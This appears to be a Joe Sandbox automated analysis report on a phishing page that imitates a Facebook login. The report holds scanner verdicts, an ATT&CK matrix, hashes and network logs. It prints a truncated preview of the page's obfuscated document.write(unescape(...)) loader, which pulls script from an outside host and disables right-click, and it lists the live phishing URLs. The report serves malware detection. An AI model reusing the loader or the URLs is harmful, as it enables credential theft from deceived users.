        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 --field-trial-handle=2536,i,12870712407425050834,15902739686211572899,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Obfuscated Files or Information
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html100%Avira URL Cloudphishing
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://emma-24.com/index.php?username=panilover0%Avira URL Cloudsafe
        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.css100%Avira URL Cloudphishing
        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpg100%Avira URL Cloudphishing
        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/style.css100%Avira URL Cloudphishing
        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.png100%Avira URL Cloudphishing
        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/favicon.ico100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        emma-24.com
        172.93.105.3
        truefalse
          unknown
          whos.amung.us
          172.67.8.141
          truefalse
            high
            mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
            216.198.79.1
            truetrue
              unknown
              www.google.com
              216.58.206.36
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://whos.amung.us/pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/false
                  high
                  https://whos.amung.us/pingjs/?k=condiossi729&t=LA%20CENTRAL%20%F0%9F%91%BB&x=https://www.facebook.com/false
                    high
                    https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpgfalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/favicon.icofalse
                    • Avira URL Cloud: phishing
                    unknown
                    https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.htmltrue
                      unknown
                      https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html#0.8618136143807968true
                        unknown
                        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.cssfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/style.cssfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://whos.amung.us/pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/false
                          high
                          https://emma-24.com/index.php?username=paniloverfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.pngfalse
                          • Avira URL Cloud: phishing
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          104.22.74.171
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          172.93.105.3
                          emma-24.comUnited States
                          23470RELIABLESITEUSfalse
                          216.198.79.1
                          mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.appUnited States
                          11696NBS11696UStrue
                          172.67.8.141
                          whos.amung.usUnited States
                          13335CLOUDFLARENETUSfalse
                          216.58.206.36
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          IP
                          192.168.2.4
                          192.168.2.6
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1591436
                          Start date and time:2025-01-15 00:41:32 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 59s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal84.phis.win@16/22@12/8
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.185.238, 142.250.110.84, 142.250.184.206, 216.58.206.46, 142.250.186.42, 142.250.186.170, 142.250.186.106, 142.250.185.74, 216.58.206.74, 216.58.212.170, 142.250.185.202, 142.250.74.202, 172.217.18.10, 142.250.184.234, 142.250.185.106, 142.250.185.234, 142.250.185.138, 172.217.16.202, 142.250.186.74, 142.250.185.170, 2.17.190.73, 199.232.210.172, 142.250.185.206, 142.250.181.238, 216.58.212.174, 172.217.16.206, 216.58.206.35, 142.250.185.142, 13.107.246.45, 2.23.242.162, 20.12.23.50, 4.175.87.197
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          No simulations
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):28
                          Entropy (8bit):4.2359263506290326
                          Encrypted:false
                          SSDEEP:3:QQinP90NY:+P1
                          MD5:7CD44B2C77526F4FA4CC7FC0BB388924
                          SHA1:46A26A23C8384B55BDC9012212BD4F82C341FB12
                          SHA-256:803331C1A11F7BD2503BB16AA5F3EE4A448D7D47D003B371F485B3042222C283
                          SHA-512:92F2005F088F928320C07487F26A293AB96107A94A2E0611262B9E30200C8FB9FE612D541737CE587C95C53BA89E43F3476CFED333301AB4E8BBDB03084D94DB
                          Malicious:false
                          Reputation:low
                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwlBedLZKxqTjBIFDXhvEhkSBQ3Fk8Qk?alt=proto
                          Preview:ChIKBw14bxIZGgAKBw3Fk8QkGgA=
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):4.008132025833399
                          Encrypted:false
                          SSDEEP:3:A8mEzRWkBJ9:eE9Wu9
                          MD5:3BC42C69B61D74A67ADEFAD48CC03976
                          SHA1:0A0558ACBA806D6ECDE801C904B1E05F667CD0BD
                          SHA-256:4D6926098B4A9B4361925A026B542DE06199DD417667E629700B15BDB0A62641
                          SHA-512:0458D0E319DA17D693493AF5A849240078EE35424F6F9F37B78795CC26A1078DF4BD43144D761B8711FFBE8AEFE0B2D3F896FD830AF36CEDCD07E9B1BCB06746
                          Malicious:false
                          Reputation:low
                          Preview:WAU_r_('6','pe3434gg',-1);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):39
                          Entropy (8bit):4.31426624499232
                          Encrypted:false
                          SSDEEP:3:ErAbcBxYAFDJvzqxgl:1wBxYA7vzqxg
                          MD5:D4AC7F1BBA70BA87C56E6D93092B7CCA
                          SHA1:96492A95A7F9153EED58A3598C4CCE56EDC6F8D1
                          SHA-256:91218093A08027E8F69C8051F9DEEF1FE6C22B278B3F6BDF761E7587CB272774
                          SHA-512:AFDE5B08290C83B95037CACE1B4625457690C824E21615A01413CE8A1040F8C86CD6ABD873DDD57D31C053F835C0F05EB5CDA2B102A17EF558240E73A1AFD1F4
                          Malicious:false
                          Reputation:low
                          URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.css
                          Preview:The page could not be found..NOT_FOUND.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):29
                          Entropy (8bit):3.810928306279287
                          Encrypted:false
                          SSDEEP:3:A8mXELJ9:eeJ9
                          MD5:3CF085CEAE640E17816AF9F6908BB82E
                          SHA1:754FC7316A0D8712ED5CF856B2D74BCA729DE42D
                          SHA-256:0ABE5083816B3670D19676EA2FC11F9F43D0E46F6311F1A954D3FEA2B6288528
                          SHA-512:64C85DB5E819F7BF2B514FCC8E75AC56C5BD37146EE4694963CE54EC2B1297752FBA94A863B7BF41EBD601180023C269A7AC084C780FC58AC98BB2DC7055C484
                          Malicious:false
                          Reputation:low
                          Preview:WAU_r_('6','3445435454v',-1);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):26
                          Entropy (8bit):4.008132025833399
                          Encrypted:false
                          SSDEEP:3:A8mEzRWkBJ9:eE9Wu9
                          MD5:3BC42C69B61D74A67ADEFAD48CC03976
                          SHA1:0A0558ACBA806D6ECDE801C904B1E05F667CD0BD
                          SHA-256:4D6926098B4A9B4361925A026B542DE06199DD417667E629700B15BDB0A62641
                          SHA-512:0458D0E319DA17D693493AF5A849240078EE35424F6F9F37B78795CC26A1078DF4BD43144D761B8711FFBE8AEFE0B2D3F896FD830AF36CEDCD07E9B1BCB06746
                          Malicious:false
                          Reputation:low
                          URL:https://whos.amung.us/pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/
                          Preview:WAU_r_('6','pe3434gg',-1);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):39
                          Entropy (8bit):4.31426624499232
                          Encrypted:false
                          SSDEEP:3:ErAbcBxYAFDJvzqxgl:1wBxYA7vzqxg
                          MD5:D4AC7F1BBA70BA87C56E6D93092B7CCA
                          SHA1:96492A95A7F9153EED58A3598C4CCE56EDC6F8D1
                          SHA-256:91218093A08027E8F69C8051F9DEEF1FE6C22B278B3F6BDF761E7587CB272774
                          SHA-512:AFDE5B08290C83B95037CACE1B4625457690C824E21615A01413CE8A1040F8C86CD6ABD873DDD57D31C053F835C0F05EB5CDA2B102A17EF558240E73A1AFD1F4
                          Malicious:false
                          Reputation:low
                          URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.png
                          Preview:The page could not be found..NOT_FOUND.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):29
                          Entropy (8bit):3.810928306279287
                          Encrypted:false
                          SSDEEP:3:A8mXELJ9:eeJ9
                          MD5:3CF085CEAE640E17816AF9F6908BB82E
                          SHA1:754FC7316A0D8712ED5CF856B2D74BCA729DE42D
                          SHA-256:0ABE5083816B3670D19676EA2FC11F9F43D0E46F6311F1A954D3FEA2B6288528
                          SHA-512:64C85DB5E819F7BF2B514FCC8E75AC56C5BD37146EE4694963CE54EC2B1297752FBA94A863B7BF41EBD601180023C269A7AC084C780FC58AC98BB2DC7055C484
                          Malicious:false
                          Reputation:low
                          URL:https://whos.amung.us/pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/
                          Preview:WAU_r_('6','3445435454v',-1);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):39
                          Entropy (8bit):4.31426624499232
                          Encrypted:false
                          SSDEEP:3:ErAbcBxYAFDJvzqxgl:1wBxYA7vzqxg
                          MD5:D4AC7F1BBA70BA87C56E6D93092B7CCA
                          SHA1:96492A95A7F9153EED58A3598C4CCE56EDC6F8D1
                          SHA-256:91218093A08027E8F69C8051F9DEEF1FE6C22B278B3F6BDF761E7587CB272774
                          SHA-512:AFDE5B08290C83B95037CACE1B4625457690C824E21615A01413CE8A1040F8C86CD6ABD873DDD57D31C053F835C0F05EB5CDA2B102A17EF558240E73A1AFD1F4
                          Malicious:false
                          Reputation:low
                          URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpg
                          Preview:The page could not be found..NOT_FOUND.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):39
                          Entropy (8bit):4.31426624499232
                          Encrypted:false
                          SSDEEP:3:ErAbcBxYAFDJvzqxgl:1wBxYA7vzqxg
                          MD5:D4AC7F1BBA70BA87C56E6D93092B7CCA
                          SHA1:96492A95A7F9153EED58A3598C4CCE56EDC6F8D1
                          SHA-256:91218093A08027E8F69C8051F9DEEF1FE6C22B278B3F6BDF761E7587CB272774
                          SHA-512:AFDE5B08290C83B95037CACE1B4625457690C824E21615A01413CE8A1040F8C86CD6ABD873DDD57D31C053F835C0F05EB5CDA2B102A17EF558240E73A1AFD1F4
                          Malicious:false
                          Reputation:low
                          URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/favicon.ico
                          Preview:The page could not be found..NOT_FOUND.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (2500), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):2534
                          Entropy (8bit):4.862058556823283
                          Encrypted:false
                          SSDEEP:48:7oabqSukcP6yQ+hpksLg1CTvk1CTbV4U70/Fi25KpvtF4kn5Pq82OEBKdqT:EaW3kcP6yQ+XUavoa5umcCqT
                          MD5:62423F84E27A79FD0B7590CFB2E55C91
                          SHA1:BDFD9A8F95F2A3866463663786E58C3FCB1B6FA3
                          SHA-256:DE5BBFB545A9DEAB378B174BBC7CB0CFE7677474BEBC2312B5D0DF0C7C7F8FF7
                          SHA-512:CF81B03A8CFC53F6DAD0EA0E0A5D1B33AEECEC0E81D15A6DAD40B7CAC378B72184D362C6640805095CFCD5B8A88B453F410D318A9B0D2E2760559FBA3620CDA9
                          Malicious:false
                          Reputation:low
                          URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Preview:<script>.. ..document.write(unescape("%0A%3Chtml%3E%0A%0A%3Chead%3E%0A%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%3C/meta%3E%0A%20%20%3Cmeta%20content%3D%22width%3Ddevice-width%22%20name%3D%22viewport%22%3E%3C/meta%3E%0A%20%20%3Ctitle%3Ereplit%3C/title%3E%0A%20%20%3Clink%20href%3D%22style.css%22%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%3E%3C/link%3E%0A%3C/head%3E%0A%0A%3Cbody%3E%0A%20%20%3Cscript%20async%3D%22%22%20src%3D%22https%3A//emma-24.com/index.php%3Fusername%3Dpanilover%22%20type%3D%22text/javascript%22%3E%3C/script%3E%0A%3C/body%3E%0A%0A%3C/html%3E%0A%0A%3Cimg%20alt%3D%22%22%20src%3D%22//whos.amung.us/pingjs/%3Fk%3Dcondiossi729%26amp%3Bt%3DLA%20CENTRAL%20%uD83D%uDC7B%26amp%3Bx%3Dhttps%3A//www.facebook.com/%22%20style%3D%22display%3A%20none%3B%22%20/%3E%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A%09document.oncontextmenu%20%3D%20function%28%29%7Breturn%20false%7D%0A%3C/script%3E%0A%0A%0A%0A%0A%3Cscript%20type%3D%22text/javascript%22%3E%0A//%3C%21%5BCDATA%5B%0A%2
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):30
                          Entropy (8bit):4.306890595608519
                          Encrypted:false
                          SSDEEP:3:A8m2dGNmXcYMen:e20NgcYMe
                          MD5:3C3B0CA5947DA96B7A11F9DCABC41DF6
                          SHA1:8CECBF0D11A5CEFC02B898FC151777F2740F3CD8
                          SHA-256:BE17296036457D1AA797A0941C2CB7624280FB0425C18E559BA87E88B2D8192C
                          SHA-512:28C7C22F9F78C10EA0E84261C6481BAD9EC09B0A2F51B58DEBAF1DB6CEC4A96037FA64534AF919502133096A8AE1C97208213577F2B211EF10269DBAC0236D8C
                          Malicious:false
                          Reputation:low
                          URL:https://whos.amung.us/pingjs/?k=condiossi729&t=LA%20CENTRAL%20%F0%9F%91%BB&x=https://www.facebook.com/
                          Preview:WAU_r_('8','condiossi729',-1);
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text
                          Category:downloaded
                          Size (bytes):39
                          Entropy (8bit):4.31426624499232
                          Encrypted:false
                          SSDEEP:3:ErAbcBxYAFDJvzqxgl:1wBxYA7vzqxg
                          MD5:D4AC7F1BBA70BA87C56E6D93092B7CCA
                          SHA1:96492A95A7F9153EED58A3598C4CCE56EDC6F8D1
                          SHA-256:91218093A08027E8F69C8051F9DEEF1FE6C22B278B3F6BDF761E7587CB272774
                          SHA-512:AFDE5B08290C83B95037CACE1B4625457690C824E21615A01413CE8A1040F8C86CD6ABD873DDD57D31C053F835C0F05EB5CDA2B102A17EF558240E73A1AFD1F4
                          Malicious:false
                          Reputation:low
                          URL:https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/style.css
                          Preview:The page could not be found..NOT_FOUND.
                          No static file info
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 15, 2025 00:42:18.084351063 CET49673443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:18.084364891 CET49674443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:18.412527084 CET49672443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:26.526479959 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:26.526582003 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:26.526665926 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:26.527508974 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:26.527539968 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.355237007 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.355321884 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.360982895 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.361025095 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.361411095 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.362874031 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.362874031 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.362909079 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.363157988 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.403340101 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.537336111 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.537440062 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.537606955 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.538273096 CET49716443192.168.2.640.115.3.253
                          Jan 15, 2025 00:42:27.538311005 CET4434971640.115.3.253192.168.2.6
                          Jan 15, 2025 00:42:27.692089081 CET49673443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:27.692101955 CET49674443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:28.020632029 CET49672443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:29.640083075 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:29.640161991 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:29.643418074 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:29.646289110 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:29.646328926 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:29.667907000 CET44349705173.222.162.64192.168.2.6
                          Jan 15, 2025 00:42:29.668076992 CET49705443192.168.2.6173.222.162.64
                          Jan 15, 2025 00:42:30.310386896 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:30.310705900 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:30.310731888 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:30.312238932 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:30.312365055 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:30.316107035 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:30.316375017 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:30.363799095 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:30.363823891 CET44349718216.58.206.36192.168.2.6
                          Jan 15, 2025 00:42:30.410499096 CET49718443192.168.2.6216.58.206.36
                          Jan 15, 2025 00:42:30.862890959 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:30.862924099 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:30.863008022 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:30.863060951 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:30.863099098 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:30.863157988 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:30.863404036 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:30.863420010 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:30.863535881 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:30.863548994 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.332351923 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.333410025 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.333437920 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.334305048 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.334373951 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.336287975 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.336343050 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.336447954 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.336457014 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.347570896 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.347724915 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.347753048 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.348664999 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.348829031 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.349436998 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.349504948 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.382894039 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.398235083 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.398262024 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.444926977 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.638267040 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.638314009 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.638413906 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.638415098 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.638487101 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.639096022 CET49723443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.639141083 CET44349723216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.714481115 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.737476110 CET49729443192.168.2.6172.67.8.141
                          Jan 15, 2025 00:42:31.737523079 CET44349729172.67.8.141192.168.2.6
                          Jan 15, 2025 00:42:31.737593889 CET49729443192.168.2.6172.67.8.141
                          Jan 15, 2025 00:42:31.737910986 CET49729443192.168.2.6172.67.8.141
                          Jan 15, 2025 00:42:31.737926006 CET44349729172.67.8.141192.168.2.6
                          Jan 15, 2025 00:42:31.759336948 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.830053091 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.830153942 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:31.830216885 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.831089973 CET49722443192.168.2.6216.198.79.1
                          Jan 15, 2025 00:42:31.831105947 CET44349722216.198.79.1192.168.2.6
                          Jan 15, 2025 00:42:32.037776947 CET49736443192.168.2.6172.93.105.3
                          Jan 15, 2025 00:42:32.037831068 CET44349736172.93.105.3192.168.2.6
                          Jan 15, 2025 00:42:32.037974119 CET49736443192.168.2.6172.93.105.3
                          Jan 15, 2025 00:42:32.046576977 CET49736443192.168.2.6172.93.105.3
